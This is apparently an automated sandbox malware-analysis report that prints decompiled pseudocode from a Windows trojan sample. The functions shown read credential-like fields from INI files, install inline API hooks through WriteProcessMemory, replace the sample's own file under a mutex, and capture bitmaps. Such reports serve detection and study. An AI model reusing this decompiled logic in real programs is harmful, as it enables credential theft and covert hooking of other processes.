				signed int _t65;
				signed int _t67;
				signed int _t74;
				signed int _t77;
				long _t78;
				long _t79;
				signed int _t83;
				void* _t86;
				signed int _t92;
				signed int _t99;
				signed int _t101;
				signed char _t115;
				signed int _t118;
				short _t122;
				void* _t125;
				WCHAR* _t128;

				_t119 = __ecx;
				_t122 = _a4;
				_t54 = E00419DD8(__ecx,  *_t122, (0 |  *_t122 != 0x00000000) + 0x78d0c213, 2);
				_v1620 = _t54;
				if(_t54 != 0) {
					_v1596 =  *0x421d2c;
					_v1592 =  &_v268;
					_v1604 = E004132CC;
					_v1600 = 0x413408;
					_v1584 = _t122;
					E0041A05C( &_v1060);
					E004086CB( &_v268,  &_v997, 0x102);
					_t63 =  *_t122 & 0x000000ff;
					__eflags = _t63;
					if(_t63 == 0) {
						_t65 = _v644 >> 0x10;
						__eflags = _t65;
						_v1616 = _t65;
						_v1620 = _v644 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t63 != 1;
						if(_t63 != 1) {
							L7:
							_t67 = _v1616;
						} else {
							_t119 = _v1044 & 0x0000ffff;
							_t67 = _v1044 >> 0x10;
							_v1620 = _v1044 & 0x0000ffff;
						}
					}
					_v1616 = _t67 * 0xea60;
					_v1620 = _v1620 * 0xea60;
					E00408742( &_v1060,  &_v1060, 0, 0x318);
					_v1592 = 0;
					_t74 = E00419F02();
					__eflags = _t74;
					if(_t74 != 0) {
						do {
							__eflags =  *_t122;
							_v1621 = 1;
							if( *_t122 != 0) {
								L23:
								_t77 = E0041AA4F(_t119);
								_t127 = _t77;
								__eflags = _t77;
								if(__eflags == 0) {
									goto L32;
								} else {
									_v1620 = E0040E2AD(0, _t120, __eflags, _t127, 0x4e23, 0x10000000);
									E0040868F(_t127);
									__eflags = _v1624;
									if(_v1624 == 0) {
										L28:
										_t115 = _v1621;
									} else {
										_v1588 = _v1588 & 0;
										_t99 = E00413091(_t119, _t120,  &_v1588, 1);
										__eflags = _t99;
										if(_t99 == 0) {
											goto L28;
										} else {
											 *(_t122 + 8) =  *(_t122 + 8) | 0xffffffff;
											_t101 = E00413859( &_v1608);
											__eflags = _t101;
											_t115 = (0 | _t101 != 0x00000000) - 0x00000001 & 0x00000002;
											E0040E6DA(_t122 + 8);
											E0040868F(_v1588);
										}
									}
									E0040868F(_v1608);
									__eflags = _t115 - 2;
									if(_t115 != 2) {
										_t78 = _v1616;
										__eflags = _t115;
										if(_t115 != 0) {
											goto L32;
										}
									} else {
										_t78 = _v1620;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E00412F50( !( ~(_v1580 & 0x0000ffff)) &  &_v1580, _t119, 0);
								_t128 = _t122 + 0x122;
								_t83 = GetFileAttributesW( &_v1584);
								__eflags = _t83 - 0xffffffff;
								if(_t83 == 0xffffffff) {
									_t83 = GetFileAttributesW(0x421258);
									__eflags = _t83 - 0xffffffff;
									if(_t83 == 0xffffffff) {
										goto L32;
									} else {
										_t119 = 0x421258;
										goto L14;
									}
								} else {
									_t119 =  &_v1580;
									L14:
									_t120 = _t128;
									E00408A32(_t83 | 0xffffffff, _t119, _t120);
									_t86 = E0040DA56(_t120, _t128);
									__eflags = _t86 - 0xffffffff;
									if(_t86 != 0xffffffff) {
										L16:
										__eflags = _t120;
										if(__eflags > 0) {
											goto L27;
										} else {
											if(__eflags < 0) {
												L19:
												__eflags = lstrcmpiW(_t128,  &_v1580);
												if(__eflags == 0) {
													goto L23;
												} else {
													_t118 = E00419DD8(_t119, __eflags, 0x8793aef0, 2);
													__eflags = _t118;
													if(_t118 == 0) {
														goto L32;
													} else {
														_t92 = MoveFileExW(_t128,  &_v1580, 0xb);
														__eflags = _t92;
														if(_t92 == 0) {
															goto L32;
														} else {
															E0040BE5B(_t118);
															__eflags = _t92 | 0xffffffff;
															_t119 =  &_v1584;
															_t120 = _t128;
															E00408A32(_t92 | 0xffffffff,  &_v1584, _t128);
															goto L23;
														}
													}
												}
											} else {
												__eflags = _t86 - 0xffffffff;
												if(_t86 > 0xffffffff) {
													goto L27;
												} else {
													goto L19;
												}
											}
										}
									} else {
										__eflags = _t120;
										if(_t120 == 0) {
											L27:
											E0040DA97(_t128);
											L32:
											_t78 = 0x7530;
										} else {
											goto L16;
										}
									}
								}
							}
							_t79 = WaitForSingleObject( *0x421d2c, _t78);
							__eflags = _t79 - 0x102;
						} while (_t79 == 0x102);
					}
					E0040BE5B(_v1612);
					_t125 = 0;
				} else {
					_t125 = 1;
				}
				E0040868F(_t122);
				return _t125;
			}

0x00413470
0x0041347f
0x00413493
0x00413498
0x0041349e
0x004134b9
0x004134c4
0x004134cf
0x004134d7
0x004134df
0x004134e3
0x004134fd
0x00413505
0x00413505
0x00413507
0x0041352b
0x0041352b
0x0041352e
0x0041353a
0x00000000
0x00413509
0x00413509
0x0041350a
0x0041353e
0x0041353e
0x0041350c
0x0041350c
0x0041351b
0x0041351e
0x0041351e
0x0041350a
0x00413548
0x0041355b
0x00413568
0x0041356f
0x00413574
0x00413579
0x0041357b
0x00413581
0x00413581
0x00413584
0x00413589
0x0041365a
0x0041365a
0x0041365f
0x00413661
0x00413663
0x00000000
0x00413669
0x0041367c
0x00413680
0x00413685
0x00413689
0x004136d0
0x004136d0
0x0041368b
0x0041368b
0x00413696
0x0041369b
0x0041369d
0x00000000
0x0041369f
0x004136a2
0x004136a9
0x004136ae
0x004136b5
0x004136b8
0x004136c1
0x004136c1
0x0041369d
0x004136d8
0x004136dd
0x004136e0
0x004136e8
0x004136ec
0x004136ee
0x00000000
0x00000000
0x004136e2
0x004136e2
0x004136e2
0x004136e0
0x0041358f
0x00413596
0x004135a2
0x004135b2
0x004135b8
0x004135ba
0x004135bd
0x004135ca
0x004135cc
0x004135cf
0x00000000
0x004135d5
0x004135d5
0x00000000
0x004135d5
0x004135bf
0x004135bf
0x004135da
0x004135dd
0x004135df
0x004135e5
0x004135ea
0x004135ed
0x004135f7
0x004135f7
0x004135f9
0x00000000
0x004135ff
0x004135ff
0x0041360a
0x00413616
0x00413618
0x00000000
0x0041361a
0x00413626
0x00413628
0x0041362a
0x00000000
0x00413630
0x00413638
0x0041363e
0x00413640
0x00000000
0x00413646
0x00413647
0x0041364c
0x0041364f
0x00413653
0x00413655
0x00000000
0x00413655
0x00413640
0x0041362a
0x00413601
0x00413601
0x00413604
0x00000000
0x00000000
0x00000000
0x00000000
0x00413604
0x004135ff
0x004135ef
0x004135ef
0x004135f1
0x004136c8
0x004136c9
0x004136f0
0x004136f0
0x00000000
0x00000000
0x00000000
0x004135f1
0x004135ed
0x004135bd
0x004136fc
0x00413702
0x00413702
0x00413581
0x00413711
0x00413716
0x004134a0
0x004134a2
0x004134a2
0x004134a4
0x004134b1

APIs

Part of subcall function 00419DD8: CreateMutexW.KERNEL32(004218A0,00000000,?,?,?,?), ref: 00419DF9

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000318,?,?,00000102), ref: 004135B8
lstrcmpiW.KERNEL32(?,?,?), ref: 00413610
MoveFileExW.KERNEL32(?,?,0000000B,8793AEF0,00000002), ref: 00413638

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: File$AttributesCreateFreeHeapMoveMutexlstrcmpi
String ID:
API String ID: 1600310851-0
Opcode ID: d3e2cb5f6f40740332edacfe4c507ad546869993a6d318ee2f45943979b5174e
Instruction ID: 90e7ba4f54e3c1d78962fcf6470aecefe1c83984ec411806685b70816700a2bb
Opcode Fuzzy Hash: d3e2cb5f6f40740332edacfe4c507ad546869993a6d318ee2f45943979b5174e
Instruction Fuzzy Hash: 6761F231604341ABD320EF65C881AEFB7D8AF41756F400A2FF495A22D1DB78DA85875E

Uniqueness

Uniqueness Score: -1.00%

Function 0041707E Relevance: 7.7, APIs: 5, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041707E(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				WCHAR* _v612;
				int _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				WCHAR* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				void* __edi;
				void* __esi;
				WCHAR* _t55;
				WCHAR* _t58;
				short* _t61;
				WCHAR* _t62;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				long _t73;
				WCHAR* _t74;
				int _t78;
				WCHAR* _t81;
				long _t83;
				long _t86;
				WCHAR* _t87;
				void* _t88;
				WCHAR* _t91;
				WCHAR* _t92;
				WCHAR* _t109;
				WCHAR* _t114;
				intOrPtr _t121;
				signed int _t122;
				void* _t124;

				_t124 = (_t122 & 0xfffffff8) - 0x27c;
				if(E0040DFC5( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L20:
					return 1;
				}
				_t127 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t114 = E0040865F(0x1fffe);
					_v624 = _t114;
					__eflags = _t114;
					if(_t114 == 0) {
						goto L20;
					}
					_t55 = GetPrivateProfileStringW(0, 0, 0, _t114, 0xffff,  &_v524);
					__eflags = _t55;
					if(_t55 <= 0) {
						L19:
						E0040868F(_t114);
						goto L20;
					}
					_t9 =  &(_t55[0]); // 0x1
					_t58 = E004095C6(_t114, _t9);
					__eflags = _t58;
					if(_t58 == 0) {
						goto L19;
					}
					_t109 = E0040865F(0xc1c);
					_v628 = _t109;
					__eflags = _t109;
					if(_t109 == 0) {
						goto L19;
					} else {
						_t11 =  &(_t109[0x1fe]); // 0x3fc
						_t61 = _t11;
						_v632 = _t61;
						_t62 =  &(_t61[0xff]);
						__eflags = _t62;
						_v620 = _t62;
						_v636 = _t114;
						_t63 = 0x32;
						E00412F05(_t63,  &_v608);
						_t65 = 0x33;
						E00412F05(_t65,  &_v600);
						_t67 = 0x34;
						E00412F05(_t67,  &_v576);
						_t69 = 0x35;
						E00412F05(_t69,  &_v588);
						goto L8;
						L17:
						_t74 = E00409604(_v636, 1);
						_v640 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							L8:
							_t73 = GetPrivateProfileStringW(_v636,  &_v608, 0, _t109, 0xff,  &_v524);
							__eflags = _t73;
							if(_t73 > 0) {
								_t78 = GetPrivateProfileIntW(_v636,  &_v600, 0x15,  &_v524);
								_v616 = _t78;
								__eflags = _t78 - 1 - 0xfffe;
								if(_t78 - 1 <= 0xfffe) {
									_t27 =  &(_t109[0xff]); // 0x1fe
									_t81 = _t27;
									_v612 = _t81;
									_t83 = GetPrivateProfileStringW(_v636,  &_v576, 0, _t81, 0xff,  &_v524);
									__eflags = _t83;
									if(_t83 > 0) {
										_t86 = GetPrivateProfileStringW(_v636,  &_v588, 0, _v632, 0xff,  &_v524);
										__eflags = _t86;
										if(_t86 > 0) {
											_t87 = E00416F52(_v636, _v632);
											__eflags = _t87;
											if(_t87 > 0) {
												_t120 =  &_v564;
												_t88 = 0x2b;
												E00412F05(_t88,  &_v564);
												_push(_v616);
												_push(_t109);
												_push(_v632);
												_t110 = _v620;
												_push(_v612);
												_t91 = E00409450(_t120, 0x311, _v620, _t120);
												_t124 = _t124 + 0x14;
												__eflags = _t91;
												if(_t91 > 0) {
													_t121 = _a4;
													_t92 = E00408A85(_t91, _t121, _t110);
													__eflags = _t92;
													if(_t92 != 0) {
														_t43 = _t121 + 4;
														 *_t43 =  &(( *(_t121 + 4))[0]);
														__eflags =  *_t43;
													}
												}
												_t109 = _v628;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							E0040868F(_t109);
							_t114 = _v628;
							goto L19;
						}
					}
				} else {
					E00417024(_t127,  &_v524, _a4);
					goto L20;
				}
			}

0x00417084
0x004170a2
0x0041727d
0x00417285
0x00417285
0x004170a8
0x004170ab
0x004170cc
0x004170d0
0x004170d4
0x004170d6
0x00000000
0x00000000
0x004170f3
0x004170f5
0x004170f7
0x00417277
0x00417278
0x00000000
0x00417278
0x004170fd
0x00417102
0x00417107
0x00417109
0x00000000
0x00000000
0x00417119
0x0041711b
0x0041711f
0x00417121
0x00000000
0x00417127
0x00417127
0x00417127
0x0041712d
0x00417131
0x00417131
0x00417138
0x0041713c
0x00417144
0x00417145
0x00417150
0x00417151
0x0041715c
0x0041715d
0x00417168
0x00417169
0x00417169
0x00417256
0x0041725c
0x00417261
0x00417265
0x00417267
0x0041716e
0x00417188
0x0041718a
0x0041718c
0x004171a5
0x004171ab
0x004171b0
0x004171b5
0x004171c4
0x004171c4
0x004171cb
0x004171da
0x004171dc
0x004171de
0x004171f8
0x004171fa
0x004171fc
0x00417206
0x0041720b
0x0041720d
0x00417211
0x00417215
0x00417216
0x0041721b
0x00417221
0x00417222
0x00417226
0x0041722a
0x00417234
0x00417239
0x0041723c
0x0041723e
0x00417240
0x00417246
0x0041724b
0x0041724d
0x0041724f
0x0041724f
0x0041724f
0x0041724f
0x0041724d
0x00417252
0x00417252
0x0041720d
0x004171fc
0x004171de
0x004171b5
0x00000000
0x0041726d
0x0041726e
0x00417273
0x00000000
0x00417273
0x00417267
0x004170ad
0x004170b8
0x00000000
0x004170b8

APIs

Part of subcall function 0040DFC5: PathCombineW.SHLWAPI(?,?,?,0041A149,?,004218C8,00000000,00000032,?), ref: 0040DFE5

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 004170F3
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00417188
GetPrivateProfileIntW.KERNEL32 ref: 004171A5
GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 004171DA
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 004171F8

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: e00ffe0ab5e9ad9d79428ce5ca7dab325e0ce218ada04d51a3058cf33240250b
Instruction ID: 1e63f9e1ac4292d0feab33ec5f221af7a3364b9d1f0dc36d29ffade612b2fe6a
Opcode Fuzzy Hash: e00ffe0ab5e9ad9d79428ce5ca7dab325e0ce218ada04d51a3058cf33240250b
Instruction Fuzzy Hash: 5551D672508306AAC720EB61CD45EEBB7F9EF88704F00096EB984E3291D778DD46C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5AA Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040E5AA(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E0040DA2F(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E0040D9DF( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E0040D9DF( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E0040D9DF( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x0040e5aa
0x0040e5aa
0x0040e5aa
0x0040e5b2
0x0040e5c7
0x0040e5cb
0x0040e5d1
0x0040e5d6
0x0040e5dd
0x0040e5e6
0x0040e5e9
0x0040e5ef
0x0040e616
0x0040e618
0x0040e61e
0x0040e5f1
0x0040e5f3
0x0040e6bb
0x0040e6bb
0x0040e6bf
0x0040e6bf
0x0040e6bf
0x0040e6c8
0x0040e6cc
0x0040e5f9
0x0040e606
0x0040e609
0x0040e614
0x0040e628
0x0040e628
0x0040e62b
0x00000000
0x00000000
0x0040e631
0x0040e635
0x0040e695
0x0040e69e
0x0040e6a3
0x0040e6a5
0x00000000
0x0040e6ab
0x0040e6ad
0x0040e6b3
0x0040e6b5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e6b5
0x0040e637
0x0040e63a
0x0040e646
0x0040e649
0x0040e64c
0x0040e64e
0x0040e651
0x0040e654
0x0040e693
0x0040e693
0x0040e693
0x00000000
0x0040e656
0x0040e656
0x0040e65d
0x0040e65d
0x0040e662
0x00000000
0x0040e664
0x0040e66a
0x0040e66f
0x0040e671
0x00000000
0x0040e673
0x0040e681
0x0040e684
0x0040e687
0x0040e68d
0x0040e68f
0x0040e626
0x0040e626
0x00000000
0x0040e691
0x00000000
0x0040e691
0x0040e68f
0x0040e671
0x0040e658
0x0040e658
0x0040e65b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e65b
0x0040e656
0x0040e654
0x00000000
0x0040e635
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e614
0x0040e5f3
0x0040e5ef
0x0040e6d1
0x0040e6d7

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 0040E5CB

Part of subcall function 0040DA2F: GetFileSizeEx.KERNEL32(@,@,?,?,?,0040E5E2,00000000), ref: 0040DA3B

ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0040E60C
CloseHandle.KERNEL32(?,00000000), ref: 0040E618
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 0040E687
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040E6AD

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: e0f26eccc62dddde8ca7f4492279a6b57d264e4dfa76a9ee8d05fefc3149cdc5
Instruction ID: 9523e458b0eab31143bfa7aca6b3df73c31da3929fcfad25f1a8a7a536cf4cb3
Opcode Fuzzy Hash: e0f26eccc62dddde8ca7f4492279a6b57d264e4dfa76a9ee8d05fefc3149cdc5
Instruction Fuzzy Hash: E941CF30900204AEDB208FA6DC45BAFBBB9EF94350F54493AF591B22E0D33A4951CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF0E Relevance: 7.6, APIs: 5, Instructions: 108
injectionCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040CF0E(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
				long _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t47;
				void* _t58;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				intOrPtr* _t66;
				long _t68;
				DWORD* _t69;
				void* _t71;

				_t63 = __edx;
				_t61 = __ecx;
				_t58 = __eax;
				_t69 = 0;
				_v12 = 0;
				if(E0040CEC9(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
					L18:
					return _v12;
				} else {
					E00408742( &_v48,  &_v48, 0xffffff90, 0x23);
					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
						L17:
						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
						goto L18;
					} else {
						_t66 =  &_v48;
						_push(0);
						_push(_t66);
						while(1) {
							_t47 = E0041C160(_t58, _t61, _t63, _t66, _t69);
							if(_t47 == 0xffffffff) {
								break;
							}
							_t69 = _t69 + _t47;
							if(_t69 > 0x1e) {
								L16:
								goto L17;
							}
							_t61 =  *_t66;
							if(_t61 == 0xe9 || _t61 == 0xe8) {
								if(_t47 == 5) {
									 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 - _a8;
								}
							}
							_push(0);
							if(_t69 >= 5) {
								_t17 = _t69 + 5; // 0x5
								_t68 = _t17;
								 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 - _a8 - 5;
								 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
								if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t68, ??) != 0) {
									_t62 = _a4;
									_v48 = 0xe9;
									_v47 = _t58 - _t62 - 5;
									E00416AA8(_t62, _a8);
									if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
										_v12 = _t68;
									}
								}
								goto L16;
							}
							_t66 = _t71 + _t69 - 0x2c;
							_push(_t66);
						}
						goto L16;
					}
				}
			}

0x0040cf0e
0x0040cf0e
0x0040cf16
0x0040cf1b
0x0040cf1d
0x0040cf28
0x0040d022
0x0040d028
0x0040cf49
0x0040cf51
0x0040cf6a
0x0040d00e
0x0040d01c
0x00000000
0x0040cf70
0x0040cf71
0x0040cf74
0x0040cf77
0x0040cfab
0x0040cfab
0x0040cfb3
0x00000000
0x00000000
0x0040cf7a
0x0040cf7f
0x0040d00d
0x00000000
0x0040d00d
0x0040cf85
0x0040cf8a
0x0040cf94
0x0040cf9c
0x0040cf9c
0x0040cf94
0x0040cf9f
0x0040cfa4
0x0040cfbd
0x0040cfbd
0x0040cfc3
0x0040cfcf
0x0040cfe0
0x0040cfe2
0x0040cfed
0x0040cff1
0x0040cff4
0x0040d008
0x0040d00a
0x0040d00a
0x0040d008
0x00000000
0x0040cfe0
0x0040cfa6
0x0040cfaa
0x0040cfaa
0x00000000
0x0040cfb5
0x0040cf6a

APIs

Part of subcall function 0040CEC9: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,?,?,?,?,?,00416A48,00000000,00000000,00000004), ref: 0040CEDE

VirtualProtectEx.KERNEL32(000000FF,?,0000001E,00000040,?,?,00000004), ref: 0040CF3B
ReadProcessMemory.KERNEL32(000000FF,?,?,0000001E,00000000,?,00000090,00000023), ref: 0040CF62
WriteProcessMemory.KERNEL32(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 0040CFDC
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000), ref: 0040D004
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,?,?), ref: 0040D01C

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID:
API String ID: 390532180-0
Opcode ID: 966898644bcc6300fb26b9fec630e7c992ba0169914480f0528a3958e3e508d8
Instruction ID: d0ed086b0abf0063d4bc3eccf8c7fbffd7d0339d16cd36ed5c7c54d2f83e69ef
Opcode Fuzzy Hash: 966898644bcc6300fb26b9fec630e7c992ba0169914480f0528a3958e3e508d8
Instruction Fuzzy Hash: E1315E72900219BADF109FF9CC84EDE7B69EB09774F108326F935B61D0C674D9418B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECC1 Relevance: 7.6, APIs: 5, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040ECC1(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				signed int _t35;
				void* _t37;
				WORD _t38;
				short _t43;
				struct HBITMAP__* _t44;
				void* _t45;
				signed int _t52;
				signed int _t53;
				BITMAPINFO** _t58;
				BITMAPINFO* _t60;

				_t53 = __edx;
				_v8 = 0;
				_t60 = E0040865F(0x428);
				if(_t60 == 0) {
					L18:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L20:
					return _v8;
				}
				_t60->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t60, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t60, 0) == 0) {
					L17:
					E0040868F(_t60);
					goto L18;
				} else {
					DeleteObject(_a24);
					_t35 = _t60->bmiHeader.biHeight;
					_a24 = 0;
					if(_t35 < 0) {
						_t35 =  ~_t35;
					}
					_t52 =  ~_t35;
					_t37 = (_t60->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_t60->bmiHeader.biHeight = _t52;
					if(_t37 == 0) {
						L9:
						_t60->bmiHeader.biClrUsed = 0;
						_push(8);
						_t60->bmiHeader.biClrImportant = 0;
						goto L10;
					} else {
						_t45 = _t37 - 3;
						if(_t45 == 0) {
							goto L9;
						}
						if(_t45 != 0x14) {
							L11:
							asm("cdq");
							_t43 = (_t60->bmiHeader.biBitCount & 0x0000ffff) * _t60->bmiHeader.biWidth * _t52 + (_t53 & 0x00000007) >> 3;
							if(_t43 < 0) {
								_t43 =  ~_t43;
							}
							_t58 = _a8;
							_t60->bmiHeader.biSizeImage = _t43;
							_t60->bmiHeader.biCompression = 0;
							if(_t58 != 0) {
								 *_t58 = _t60;
							}
							_t44 = CreateDIBSection(_a4, _t60, 0, _a12, _a16, _a20);
							_v8 = _t44;
							if(_t44 == 0 || _t58 == 0) {
								goto L17;
							} else {
								goto L20;
							}
						}
						_push(0x20);
						L10:
						_pop(_t38);
						_t60->bmiHeader.biBitCount = _t38;
						goto L11;
					}
				}
			}

0x0040ecc1
0x0040eccf
0x0040ecd7
0x0040ecdb
0x0040eda5
0x0040eda8
0x0040edad
0x0040edad
0x0040edb3
0x0040edba
0x0040edba
0x0040ecf0
0x0040ecfd
0x0040ed9f
0x0040eda0
0x00000000
0x0040ed19
0x0040ed1c
0x0040ed22
0x0040ed27
0x0040ed2a
0x0040ed2c
0x0040ed2c
0x0040ed34
0x0040ed36
0x0040ed37
0x0040ed3a
0x0040ed4a
0x0040ed4a
0x0040ed4d
0x0040ed4f
0x00000000
0x0040ed3c
0x0040ed3c
0x0040ed3f
0x00000000
0x00000000
0x0040ed44
0x0040ed57
0x0040ed62
0x0040ed68
0x0040ed6d
0x0040ed6f
0x0040ed6f
0x0040ed71
0x0040ed74
0x0040ed77
0x0040ed7c
0x0040ed7e
0x0040ed7e
0x0040ed8e
0x0040ed94
0x0040ed99
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ed99
0x0040ed46
0x0040ed52
0x0040ed52
0x0040ed53
0x00000000
0x0040ed53
0x0040ed3a

APIs

GetDIBits.GDI32(00000000,0041B4E4,00000000,00000001,00000000,00000000,00000000), ref: 0040ECF9
GetDIBits.GDI32(00000000,0041B4E4,00000000,00000001,00000000,00000000,00000000), ref: 0040ED0F
DeleteObject.GDI32(0041B4E4), ref: 0040ED1C
CreateDIBSection.GDI32(00000000,00000000,00000000,?,?,2937498D), ref: 0040ED8E
DeleteObject.GDI32(0041B4E4), ref: 0040EDAD

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

